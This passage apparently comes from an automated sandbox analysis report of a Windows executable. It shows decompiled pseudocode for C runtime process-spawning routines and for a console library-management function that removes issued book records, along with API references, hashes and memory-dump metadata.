					E00AF69AD(GetLastError());
					if(_t129 != _t124) {
						CloseHandle(_t129);
					}
					if(_t118 != _t124) {
						CloseHandle(_t118);
					}
					L30:
					L00AF4D62(_v12);
					_v12 = _v12 & 0x00000000;
					L00AF4D62(_v8);
					_v8 = _v8 & 0x00000000;
					L00AF4D62(_v16);
					_t92 = _t124;
					L34:
					goto L35;
				}
				_t82 = _a4;
				if(_t82 != 2) {
					if(_t82 != 0) {
						if(_t82 != 4) {
							if(_t129 != _t124) {
								CloseHandle(_t129);
							}
							L00AF4D62(_v12);
							_v12 = _v12 & 0x00000000;
							L00AF4D62(_v8);
							_v8 = _v8 & 0x00000000;
							L00AF4D62(_v16);
							_t92 = _t118;
							goto L34;
						}
						if(_t129 != _t124) {
							CloseHandle(_t129);
						}
						if(_t118 != _t124) {
							CloseHandle(_t118);
						}
						_t124 = 0;
						goto L30;
					}
					WaitForSingleObject(_t118, _t124);
					GetExitCodeProcess(_v44,  &_v24);
					_v28 = _v24;
					if(_t129 != _t124) {
						CloseHandle(_t129);
					}
					if(_t118 != _t124) {
						CloseHandle(_t118);
					}
					_t124 = _v28;
					goto L30;
				}
				E00AD916E(0);
				asm("int3");
				return L00B0CFB1(_t118, _t124,  *_v124,  *_v120,  *_v116,  *(_v112.cb));
			}























                                                  0x00afe687
                                                  0x00afe689
                                                  0x00afe68e
                                                  0x00000000
                                                  0x00afe699
                                                  0x00afe6a5
                                                  0x00000000
                                                  0x00000000
                                                  0x00afe6ab
                                                  0x00afe6b2
                                                  0x00000000
                                                  0x00afe6b2
                                                  0x00afe6b7
                                                  0x00afe6b8
                                                  0x00afe6c2
                                                  0x00afe6c9
                                                  0x00afe6cf
                                                  0x00afe6d4
                                                  0x00afe6dc
                                                  0x00afe6e1
                                                  0x00afe6e9
                                                  0x00afe6ec
                                                  0x00afe738
                                                  0x00afe738
                                                  0x00afe881
                                                  0x00000000
                                                  0x00afe882
                                                  0x00afe6f9
                                                  0x00afe715
                                                  0x00afe71a
                                                  0x00afe722
                                                  0x00afe725
                                                  0x00afe72d
                                                  0x00afe730
                                                  0x00000000
                                                  0x00afe735
                                                  0x00afe746
                                                  0x00afe748
                                                  0x00afe74a
                                                  0x00afe74a
                                                  0x00afe751
                                                  0x00afe758
                                                  0x00afe75d
                                                  0x00afe762
                                                  0x00afe76e
                                                  0x00afe775
                                                  0x00afe77f
                                                  0x00afe794
                                                  0x00afe79a
                                                  0x00afe79d
                                                  0x00afe7a2
                                                  0x00afe7ab
                                                  0x00afe7b3
                                                  0x00afe7b6
                                                  0x00afe7b6
                                                  0x00afe7be
                                                  0x00afe7c1
                                                  0x00afe7c1
                                                  0x00afe82c
                                                  0x00afe82f
                                                  0x00afe837
                                                  0x00afe83b
                                                  0x00afe843
                                                  0x00afe847
                                                  0x00afe84c
                                                  0x00afe87d
                                                  0x00000000
                                                  0x00afe880
                                                  0x00afe7c9
                                                  0x00afe7cf
                                                  0x00afe7d7
                                                  0x00afe812
                                                  0x00afe852
                                                  0x00afe855
                                                  0x00afe855
                                                  0x00afe85e
                                                  0x00afe866
                                                  0x00afe86a
                                                  0x00afe872
                                                  0x00afe876
                                                  0x00afe87b
                                                  0x00000000
                                                  0x00afe87b
                                                  0x00afe816
                                                  0x00afe819
                                                  0x00afe819
                                                  0x00afe821
                                                  0x00afe824
                                                  0x00afe824
                                                  0x00afe82a
                                                  0x00000000
                                                  0x00afe82a
                                                  0x00afe7db
                                                  0x00afe7e8
                                                  0x00afe7f1
                                                  0x00afe7f6
                                                  0x00afe7f9
                                                  0x00afe7f9
                                                  0x00afe801
                                                  0x00afe804
                                                  0x00afe804
                                                  0x00afe80a
                                                  0x00000000
                                                  0x00afe80a
                                                  0x00afe889
                                                  0x00afe88e
                                                  0x00afe8b1

                                                  APIs
                                                    • Part of subcall function 00B0D02C: _free.LIBCMT ref: 00B0D04E
                                                  • _free.LIBCMT ref: 00AFE6EC
                                                  • CreateProcessW.KERNEL32 ref: 00AFE794
                                                  • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,00000000,.com), ref: 00AFE7A4
                                                  • __dosmaperr.LIBCMT ref: 00AFE7AB
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000000,.com), ref: 00AFE7B6
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000000,.com), ref: 00AFE7C1
                                                  • WaitForSingleObject.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,00000000,.com), ref: 00AFE7DB
                                                  • GetExitCodeProcess.KERNEL32 ref: 00AFE7E8
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000000,.com), ref: 00AFE7F9
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000000,.com), ref: 00AFE804
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000000,.com), ref: 00AFE819
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000000,.com), ref: 00AFE824
                                                  • _free.LIBCMT ref: 00AFE82F
                                                  • _free.LIBCMT ref: 00AFE83B
                                                  • _free.LIBCMT ref: 00AFE847
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000000,.com), ref: 00AFE855
                                                  • _free.LIBCMT ref: 00AFE6E1
                                                    • Part of subcall function 00AF4D62: HeapFree.KERNEL32(00000000,00000000,?,00AF440C), ref: 00AF4D78
                                                    • Part of subcall function 00AF4D62: GetLastError.KERNEL32(?,?,00AF440C), ref: 00AF4D8A
                                                  • _free.LIBCMT ref: 00AFE71A
                                                  • _free.LIBCMT ref: 00AFE725
                                                  • _free.LIBCMT ref: 00AFE730
                                                  • _free.LIBCMT ref: 00AFE85E
                                                  • _free.LIBCMT ref: 00AFE86A
                                                  • _free.LIBCMT ref: 00AFE876
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _free$CloseHandle$ErrorLastProcess$CodeCreateExitFreeHeapObjectSingleWait__dosmaperr
                                                  • String ID: .com
                                                  • API String ID: 4143445633-4200470757
                                                  • Opcode ID: 703d4c421301233cf1b4928b307acf5fcf4a8cf80ed575cc6fa2d57ff7091cec
                                                  • Instruction ID: f10e6b8b29015ae56e0400422e4243476d52da459ed3a41f460bfd5c43a53511
                                                  • Opcode Fuzzy Hash: 703d4c421301233cf1b4928b307acf5fcf4a8cf80ed575cc6fa2d57ff7091cec
                                                  • Instruction Fuzzy Hash: 7861597180020CABDF11AFE4CD85AFEBB79EF48311F208166FA15A7161DB358E549BA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AFE46D, Relevance: 34.7, APIs: 23, Instructions: 186processsynchronizationCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 91%
                                                  			E00AFE46D(void* __ebx, signed int __edi, void* __esi, WCHAR* _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				long _v24;
				long _v28;
				long _v32;
				struct _PROCESS_INFORMATION _v48;
				short _v62;
				struct _STARTUPINFOW _v116;
				intOrPtr _v120;
				intOrPtr* _v240;
				intOrPtr* _v244;
				intOrPtr* _v248;
				intOrPtr* _v252;
				signed int _t124;
				void* _t129;
				intOrPtr* _t130;
				int _t138;
				WCHAR* _t139;
				signed int _t146;
				intOrPtr* _t152;
				int _t160;
				intOrPtr _t161;
				void* _t171;
				void* _t197;
				long _t222;
				void* _t223;
				long _t225;
				void* _t226;
				long _t236;
				long _t237;
				void* _t242;
				void* _t245;
				void* _t249;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t254;

				if(_a8 == 0) {
					L1:
					 *((intOrPtr*)(E00AF69E3())) = 0x16;
					return E00AF68BC() | 0xffffffff;
				}
				if(_a12 == 0) {
					goto L1;
				}
				if(_a4 > 4) {
					 *(E00AF69D0()) =  *_t219 & 0x00000000;
					goto L1;
				}
				_push(__ebx);
				_push(__edi);
				_v16 = 0;
				_v8 = 0;
				_t124 = L00B0CFB1(0, __edi, _a12, _a16,  &_v16,  &_v8);
				_t236 = __edi | 0xffffffff;
				_t252 = _t251 + 0x10;
				if(_t124 == _t236) {
					L00AF4D62(_v8);
					_v8 = 0;
					L00AF4D62(_v16);
					L9:
					_t197 = _t236;
					L35:
					return _t197;
				}
				_v12 = 0;
				_t129 = E00AFEAB6( &_v12,  &_v20, (_t124 & 0xffffff00 | _a4 != 0x00000004) & 0x000000ff);
				_t253 = _t252 + 0xc;
				if(_t129 == 0) {
					L00AF4D62(_v12);
					_v12 = 0;
					L00AF4D62(_v8);
					_v8 = 0;
					L00AF4D62(_v16);
					goto L9;
				}
				if(_a4 == 4) {
					_push(8);
					_pop(0);
				}
				_t130 = E00AF69D0();
				 *_t130 = 0;
				_t222 = 0x44;
				E00AD24C0(_t236,  &(_v116.lpReserved), 0, _t222);
				_t254 = _t253 + 0xc;
				_v62 = _v20;
				_v116.hStdInput = _v12;
				_v116.lpReserved.cb = _t222;
				_t138 = CreateProcessA(_a8, _v16, 0, 0, 1, 0, _v8, 0,  &(_v116.lpReserved),  &(_v48.hThread));
				_t223 = _v48.hThread.hProcess;
				_t242 = _v48.dwProcessId;
				if(_t138 == 0) {
					E00AF69AD(GetLastError());
					if(_t242 != _t236) {
						CloseHandle(_t242);
					}
					if(_t223 != _t236) {
						CloseHandle(_t223);
					}
					L30:
					L00AF4D62(_v12);
					_v12 = _v12 & 0x00000000;
					L00AF4D62(_v8);
					_v8 = _v8 & 0x00000000;
					L00AF4D62(_v16);
					_t197 = _t236;
					L34:
					goto L35;
				}
				_t139 = _a4;
				if(_t139 != 2) {
					if(_t139 != 0) {
						if(_t139 != 4) {
							if(_t242 != _t236) {
								CloseHandle(_t242);
							}
							L00AF4D62(_v12);
							_v12 = _v12 & 0x00000000;
							L00AF4D62(_v8);
							_v8 = _v8 & 0x00000000;
							L00AF4D62(_v16);
							_t197 = _t223;
							goto L34;
						}
						if(_t242 != _t236) {
							CloseHandle(_t242);
						}
						if(_t223 != _t236) {
							CloseHandle(_t223);
						}
						_t236 = 0;
						goto L30;
					}
					WaitForSingleObject(_t223, _t236);
					GetExitCodeProcess(_v48.hThread.hProcess,  &_v24);
					_v28 = _v24;
					if(_t242 != _t236) {
						CloseHandle(_t242);
					}
					if(_t223 != _t236) {
						CloseHandle(_t223);
					}
					_t236 = _v28;
					goto L30;
				}
				E00AD916E(0);
				asm("int3");
				_t249 = _t254;
				if(_v120 == 0) {
					L39:
					 *((intOrPtr*)(E00AF69E3())) = 0x16;
					return E00AF68BC() | 0xffffffff;
				}
				if(_a8 == 0) {
					goto L39;
				}
				if(_v0 > 4) {
					 *(E00AF69D0()) =  *_t193 & 0x00000000;
					goto L39;
				}
				_push(_t223);
				_push(_t236);
				_v20 = 0;
				_v12 = 0;
				_t146 = E00B0D02C(0, _t236, _a8, _a12,  &_v20,  &_v12);
				_t237 = _t236 | 0xffffffff;
				if(_t146 == _t237) {
					L00AF4D62(_v12);
					_v12 = 0;
					L00AF4D62(_v20);
					L47:
					_t171 = _t237;
					L73:
					return _t171;
				}
				_v16 = 0;
				if(E00AFEAB6( &_v16,  &_v24, (_t146 & 0xffffff00 | _v0 != 0x00000004) & 0x000000ff) == 0) {
					L00AF4D62(_v16);
					_v16 = 0;
					L00AF4D62(_v12);
					_v12 = 0;
					L00AF4D62(_v20);
					goto L47;
				}
				_push(_t242);
				if(_v0 == 4) {
					_push(8);
					_pop(0);
				}
				_t152 = E00AF69D0();
				 *_t152 = 0;
				_t225 = 0x44;
				E00AD24C0(_t237,  &_v116, 0, _t225);
				_v116.cbReserved2 = _v24;
				_v116.lpReserved2 = _v16;
				_v116.cb = _t225;
				_t160 = CreateProcessW(_a4, _v20, 0, 0, 1, 0x400, _v12, 0,  &_v116,  &_v48);
				_t226 = _v48.hProcess;
				_t245 = _v48.hThread;
				if(_t160 == 0) {
					E00AF69AD(GetLastError());
					if(_t245 != _t237) {
						CloseHandle(_t245);
					}
					if(_t226 != _t237) {
						CloseHandle(_t226);
					}
					L68:
					L00AF4D62(_v16);
					_v16 = _v16 & 0x00000000;
					L00AF4D62(_v12);
					_v12 = _v12 & 0x00000000;
					L00AF4D62(_v20);
					_t171 = _t237;
					L72:
					goto L73;
				}
				_t161 = _v0;
				if(_t161 != 2) {
					if(_t161 != 0) {
						if(_t161 != 4) {
							if(_t245 != _t237) {
								CloseHandle(_t245);
							}
							L00AF4D62(_v16);
							_v16 = _v16 & 0x00000000;
							L00AF4D62(_v12);
							_v12 = _v12 & 0x00000000;
							L00AF4D62(_v20);
							_t171 = _t226;
							goto L72;
						}
						if(_t245 != _t237) {
							CloseHandle(_t245);
						}
						if(_t226 != _t237) {
							CloseHandle(_t226);
						}
						_t237 = 0;
						goto L68;
					}
					WaitForSingleObject(_t226, _t237);
					GetExitCodeProcess(_v48,  &_v28);
					_v32 = _v28;
					if(_t245 != _t237) {
						CloseHandle(_t245);
					}
					if(_t226 != _t237) {
						CloseHandle(_t226);
					}
					_t237 = _v32;
					goto L68;
				}
				E00AD916E(0);
				asm("int3");
				_push(_t249);
				return L00B0CFB1(_t226, _t237,  *_v252,  *_v248,  *_v244,  *_v240);
			}











































                                                  0x00afe479
                                                  0x00afe47b
                                                  0x00afe480
                                                  0x00000000
                                                  0x00afe48b
                                                  0x00afe497
                                                  0x00000000
                                                  0x00000000
                                                  0x00afe49d
                                                  0x00afe4a4
                                                  0x00000000
                                                  0x00afe4a4
                                                  0x00afe4a9
                                                  0x00afe4aa
                                                  0x00afe4b4
                                                  0x00afe4bb
                                                  0x00afe4c1
                                                  0x00afe4c6
                                                  0x00afe4c9
                                                  0x00afe4ce
                                                  0x00afe4d3
                                                  0x00afe4db
                                                  0x00afe4de
                                                  0x00afe52a
                                                  0x00afe52a
                                                  0x00afe66d
                                                  0x00000000
                                                  0x00afe66e
                                                  0x00afe4eb
                                                  0x00afe4fd
                                                  0x00afe502
                                                  0x00afe507
                                                  0x00afe50c
                                                  0x00afe514
                                                  0x00afe517
                                                  0x00afe51f
                                                  0x00afe522
                                                  0x00000000
                                                  0x00afe527
                                                  0x00afe538
                                                  0x00afe53a
                                                  0x00afe53c
                                                  0x00afe53c
                                                  0x00afe53d
                                                  0x00afe544
                                                  0x00afe549
                                                  0x00afe54e
                                                  0x00afe557
                                                  0x00afe55a
                                                  0x00afe561
                                                  0x00afe56b
                                                  0x00afe580
                                                  0x00afe586
                                                  0x00afe589
                                                  0x00afe58e
                                                  0x00afe597
                                                  0x00afe59f
                                                  0x00afe5a2
                                                  0x00afe5a2
                                                  0x00afe5aa
                                                  0x00afe5ad
                                                  0x00afe5ad
                                                  0x00afe618
                                                  0x00afe61b
                                                  0x00afe623
                                                  0x00afe627
                                                  0x00afe62f
                                                  0x00afe633
                                                  0x00afe638
                                                  0x00afe669
                                                  0x00000000
                                                  0x00afe66c
                                                  0x00afe5b5
                                                  0x00afe5bb
                                                  0x00afe5c3
                                                  0x00afe5fe
                                                  0x00afe63e
                                                  0x00afe641
                                                  0x00afe641
                                                  0x00afe64a
                                                  0x00afe652
                                                  0x00afe656
                                                  0x00afe65e
                                                  0x00afe662
                                                  0x00afe667
                                                  0x00000000
                                                  0x00afe667
                                                  0x00afe602
                                                  0x00afe605
                                                  0x00afe605
                                                  0x00afe60d
                                                  0x00afe610
                                                  0x00afe610
                                                  0x00afe616
                                                  0x00000000
                                                  0x00afe616
                                                  0x00afe5c7
                                                  0x00afe5d4
                                                  0x00afe5dd
                                                  0x00afe5e2
                                                  0x00afe5e5
                                                  0x00afe5e5
                                                  0x00afe5ed
                                                  0x00afe5f0
                                                  0x00afe5f0
                                                  0x00afe5f6
                                                  0x00000000
                                                  0x00afe5f6
                                                  0x00afe675
                                                  0x00afe67a
                                                  0x00afe67e
                                                  0x00afe687
                                                  0x00afe689
                                                  0x00afe68e
                                                  0x00000000
                                                  0x00afe699
                                                  0x00afe6a5
                                                  0x00000000
                                                  0x00000000
                                                  0x00afe6ab
                                                  0x00afe6b2
                                                  0x00000000
                                                  0x00afe6b2
                                                  0x00afe6b7
                                                  0x00afe6b8
                                                  0x00afe6c2
                                                  0x00afe6c9
                                                  0x00afe6cf
                                                  0x00afe6d4
                                                  0x00afe6dc
                                                  0x00afe6e1
                                                  0x00afe6e9
                                                  0x00afe6ec
                                                  0x00afe738
                                                  0x00afe738
                                                  0x00afe881
                                                  0x00000000
                                                  0x00afe882
                                                  0x00afe6f9
                                                  0x00afe715
                                                  0x00afe71a
                                                  0x00afe722
                                                  0x00afe725
                                                  0x00afe72d
                                                  0x00afe730
                                                  0x00000000
                                                  0x00afe735
                                                  0x00afe743
                                                  0x00afe746
                                                  0x00afe748
                                                  0x00afe74a
                                                  0x00afe74a
                                                  0x00afe751
                                                  0x00afe758
                                                  0x00afe75d
                                                  0x00afe762
                                                  0x00afe76e
                                                  0x00afe775
                                                  0x00afe77f
                                                  0x00afe794
                                                  0x00afe79a
                                                  0x00afe79d
                                                  0x00afe7a2
                                                  0x00afe7ab
                                                  0x00afe7b3
                                                  0x00afe7b6
                                                  0x00afe7b6
                                                  0x00afe7be
                                                  0x00afe7c1
                                                  0x00afe7c1
                                                  0x00afe82c
                                                  0x00afe82f
                                                  0x00afe837
                                                  0x00afe83b
                                                  0x00afe843
                                                  0x00afe847
                                                  0x00afe84c
                                                  0x00afe87d
                                                  0x00000000
                                                  0x00afe880
                                                  0x00afe7c9
                                                  0x00afe7cf
                                                  0x00afe7d7
                                                  0x00afe812
                                                  0x00afe852
                                                  0x00afe855
                                                  0x00afe855
                                                  0x00afe85e
                                                  0x00afe866
                                                  0x00afe86a
                                                  0x00afe872
                                                  0x00afe876
                                                  0x00afe87b
                                                  0x00000000
                                                  0x00afe87b
                                                  0x00afe816
                                                  0x00afe819
                                                  0x00afe819
                                                  0x00afe821
                                                  0x00afe824
                                                  0x00afe824
                                                  0x00afe82a
                                                  0x00000000
                                                  0x00afe82a
                                                  0x00afe7db
                                                  0x00afe7e8
                                                  0x00afe7f1
                                                  0x00afe7f6
                                                  0x00afe7f9
                                                  0x00afe7f9
                                                  0x00afe801
                                                  0x00afe804
                                                  0x00afe804
                                                  0x00afe80a
                                                  0x00000000
                                                  0x00afe80a
                                                  0x00afe889
                                                  0x00afe88e
                                                  0x00afe891
                                                  0x00afe8b1

                                                  APIs
                                                    • Part of subcall function 00B0CFB1: _free.LIBCMT ref: 00B0CFD3
                                                  • _free.LIBCMT ref: 00AFE4DE
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,?,?,?,?,?), ref: 00AFE580
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AFE590
                                                  • __dosmaperr.LIBCMT ref: 00AFE597
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AFE5A2
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AFE5AD
                                                  • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AFE5C7
                                                  • GetExitCodeProcess.KERNEL32 ref: 00AFE5D4
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AFE5E5
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AFE5F0
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AFE605
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AFE610
                                                  • _free.LIBCMT ref: 00AFE61B
                                                  • _free.LIBCMT ref: 00AFE627
                                                  • _free.LIBCMT ref: 00AFE633
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AFE641
                                                  • _free.LIBCMT ref: 00AFE4D3
                                                    • Part of subcall function 00AF4D62: HeapFree.KERNEL32(00000000,00000000,?,00AF440C), ref: 00AF4D78
                                                    • Part of subcall function 00AF4D62: GetLastError.KERNEL32(?,?,00AF440C), ref: 00AF4D8A
                                                  • _free.LIBCMT ref: 00AFE50C
                                                  • _free.LIBCMT ref: 00AFE517
                                                  • _free.LIBCMT ref: 00AFE522
                                                  • _free.LIBCMT ref: 00AFE64A
                                                  • _free.LIBCMT ref: 00AFE656
                                                  • _free.LIBCMT ref: 00AFE662
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _free$CloseHandle$ErrorLastProcess$CodeCreateExitFreeHeapObjectSingleWait__dosmaperr
                                                  • String ID:
                                                  • API String ID: 4143445633-0
                                                  • Opcode ID: 15bbac893596f2c45cc2653f6fb509c405cc9fd1ee7b699691a7760151ce3e2b
                                                  • Instruction ID: b8d5c57091c623503065c3f87327689d1701ca5c6aa03c166194a20b1957d8d4
                                                  • Opcode Fuzzy Hash: 15bbac893596f2c45cc2653f6fb509c405cc9fd1ee7b699691a7760151ce3e2b
                                                  • Instruction Fuzzy Hash: DE515D7180020CEFDF22AFE0CD85AFEBB79EF44311F208166FA15A6161DB354E549B61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B1939D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 172COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E00B1939D(intOrPtr* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				void* _t5;
				void* _t11;
				void* _t12;
				void* _t15;
				intOrPtr _t26;
				void* _t27;
				void* _t30;
				void* _t31;
				void* _t34;
				void* _t35;
				void* _t37;
				void* _t42;
				intOrPtr _t45;
				void* _t46;
				intOrPtr* _t50;
				void* _t52;
				void* _t55;
				void* _t57;
				intOrPtr* _t58;
				void* _t60;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t69;
				void* _t71;

				_t58 = __esi;
				_t53 = __edx;
				_t52 = __ecx;
				_t50 = __ebx;
				_push("cls");
				E00AE3965(__ebx, __edx, __edi, __esi);
				_t63 = _t62 + 4;
				_t55 = 0xc;
				do {
					0xb27e6c->X = 0x5000a;
					_t5 =  *_t50(0xfffffff5, 0xb27e6c->X);
					 *_t58();
					E00AD1080(_t52, "Enter book id to remove:", _t5);
					E00AD10F0(_t52, 0xb22be0, _t60 - 0xc);
					 *0xb27f2c = L00AD9D57("Issue.dat", "rb+");
					_t11 = E00AF1525(0xb27ec0, 0x6c, 1, _t10);
					_t65 = _t63 + 0x24;
					if(_t11 == 1) {
						do {
							_t26 =  *0xb27ec0; // 0x0
							_t79 = _t26 -  *((intOrPtr*)(_t60 - 0xc));
							if(_t26 !=  *((intOrPtr*)(_t60 - 0xc))) {
								__eflags =  *0xb27e9c - 0x74;
								if( *0xb27e9c != 0x74) {
									goto L12;
								} else {
									goto L5;
								}
							} else {
								E00B17A40(_t53);
								 *0xb27e9c = 0x74;
								L5:
								0xb27e6c->X = 0xc000a;
								_t31 =  *_t50(0xfffffff5, 0xb27e6c->X);
								 *_t58();
								E00AD1080(_t52, "Do You Want to Remove it?(Y/N)", _t31);
								_t69 = _t65 + 4;
								_t34 = E00AF4817(_t53, _t58, _t79);
								_t80 = _t34 - 0x79;
								if(_t34 == 0x79) {
									_t35 = L00AD9D57("record.dat", "wb+");
									_push( *0xb27f2c);
									_t57 = _t35;
									E00AE3A34(_t53, _t80);
									_t37 = E00AF1525(0xb27ec0, 0x6c, 1,  *0xb27f2c);
									_t71 = _t69 + 0x1c;
									if(_t37 == 1) {
										do {
											_t45 =  *0xb27ec0; // 0x0
											if(_t45 !=  *((intOrPtr*)(_t60 - 0xc))) {
												E00ADA900(_t53,  *0xb27f2c, 0, 1);
												L00AE3D2F(0xb27ec0, 0x6c, 1, _t57);
												_t71 = _t71 + 0x1c;
											}
											_t46 = E00AF1525(0xb27ec0, 0x6c, 1,  *0xb27f2c);
											_t71 = _t71 + 0x10;
											_t83 = _t46 - 1;
										} while (_t46 == 1);
									}
									E00ADA516(_t52, _t53, _t83);
									E00ADA516(_t52, _t53, _t83);
									E00ADA59A("Issue.dat");
									E00AE3970(_t83, "record.dat", "Issue.dat");
									0xb27e6c->X = 0xe000a;
									_t42 =  *_t50(0xfffffff5, 0xb27e6c->X, _t57,  *0xb27f2c);
									 *_t58();
									E00AD1080(_t52, "The issued book is removed from list", _t42);
									_t69 = _t71 + 0x18;
									_t55 = 0xc;
								}
								if( *0xb27e9c != 0x74) {
									L12:
									0xb27e6c->X = 0xf000a;
									_t27 =  *_t50(0xfffffff5, 0xb27e6c->X);
									 *_t58();
									E00AD1080(_t52, "No Record Found", _t27);
									_t69 = _t65 + 4;
								}
							}
							_t30 = E00AF1525(0xb27ec0, 0x6c, 1,  *0xb27f2c);
							_t65 = _t69 + 0x10;
							_t85 = _t30 - 1;
						} while (_t30 == 1);
					}
					0xb27e6c->X = 0x10000a;
					_t12 =  *_t50(0xfffffff5, 0xb27e6c->X);
					 *_t58();
					E00AD1080(_t52, "Delete any more?(Y/N)", _t12);
					_t63 = _t65 + 4;
					_t15 = E00AF4817(_t53, _t58, _t85);
					_t86 = _t15 - 0x79;
				} while (_t15 == 0x79);
				0xb27e6c->X = 0x12000a;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				_push(0xb2327c);
				E00AD1080(_t52);
				E00AF4817(_t53, _t58, _t86);
				L00B18C00(_t52, _t53, _t86);
				0xb27e6c->X = 0x1e0001;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0xb27e6c);
				_push(" Press ENTER to return to main menu");
				E00AD1080(_t52);
				do {
				} while (E00AF4817(_t53, _t58, _t86) != 0xd);
				return E00B1A4D0(_t50, _t52, _t53, _t55, _t58);
			}




























                                                  0x00b1939d
                                                  0x00b1939d
                                                  0x00b1939d
                                                  0x00b1939d
                                                  0x00b1939d
                                                  0x00b193a2
                                                  0x00b193a7
                                                  0x00b193aa
                                                  0x00b193b0
                                                  0x00b193b0
                                                  0x00b193c2
                                                  0x00b193c5
                                                  0x00b193cc
                                                  0x00b193dd
                                                  0x00b193fb
                                                  0x00b19400
                                                  0x00b19405
                                                  0x00b1940b
                                                  0x00b19411
                                                  0x00b19411
                                                  0x00b19416
                                                  0x00b19419
                                                  0x00b19429
                                                  0x00b19430
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b1941b
                                                  0x00b1941b
                                                  0x00b19420
                                                  0x00b19436
                                                  0x00b19436
                                                  0x00b19448
                                                  0x00b1944b
                                                  0x00b19452
                                                  0x00b19457
                                                  0x00b1945a
                                                  0x00b1945f
                                                  0x00b19462
                                                  0x00b19472
                                                  0x00b19477
                                                  0x00b1947d
                                                  0x00b1947f
                                                  0x00b19496
                                                  0x00b1949b
                                                  0x00b194a1
                                                  0x00b194a3
                                                  0x00b194a3
                                                  0x00b194ab
                                                  0x00b194b7
                                                  0x00b194c9
                                                  0x00b194ce
                                                  0x00b194ce
                                                  0x00b194e0
                                                  0x00b194e5
                                                  0x00b194e8
                                                  0x00b194e8
                                                  0x00b194a3
                                                  0x00b194f3
                                                  0x00b194fc
                                                  0x00b19509
                                                  0x00b1951b
                                                  0x00b19523
                                                  0x00b19535
                                                  0x00b19538
                                                  0x00b1953f
                                                  0x00b19544
                                                  0x00b19547
                                                  0x00b19547
                                                  0x00b19553
                                                  0x00b19555
                                                  0x00b19555
                                                  0x00b19567
                                                  0x00b1956a
                                                  0x00b19571
                                                  0x00b19576
                                                  0x00b19576
                                                  0x00b19553
                                                  0x00b19588
                                                  0x00b1958d
                                                  0x00b19590
                                                  0x00b19590
                                                  0x00b19411
                                                  0x00b19599
                                                  0x00b195ab
                                                  0x00b195ae
                                                  0x00b195b5
                                                  0x00b195ba
                                                  0x00b195bd
                                                  0x00b195c2
                                                  0x00b195c2
                                                  0x00b195ca
                                                  0x00b195df
                                                  0x00b195e1
                                                  0x00b195e6
                                                  0x00b195ee
                                                  0x00b195f3
                                                  0x00b195f8
                                                  0x00b1960d
                                                  0x00b1960f
                                                  0x00b19614
                                                  0x00b19620
                                                  0x00b19625
                                                  0x00b19635

                                                  APIs
                                                  • __fread_nolock.LIBCMT ref: 00B19400
                                                  • __fread_nolock.LIBCMT ref: 00B19496
                                                  • __fread_nolock.LIBCMT ref: 00B194E0
                                                  • __fread_nolock.LIBCMT ref: 00B19588
                                                    • Part of subcall function 00B17A40: GetStdHandle.KERNEL32(000000F5), ref: 00B17A68
                                                    • Part of subcall function 00B17A40: SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17A71
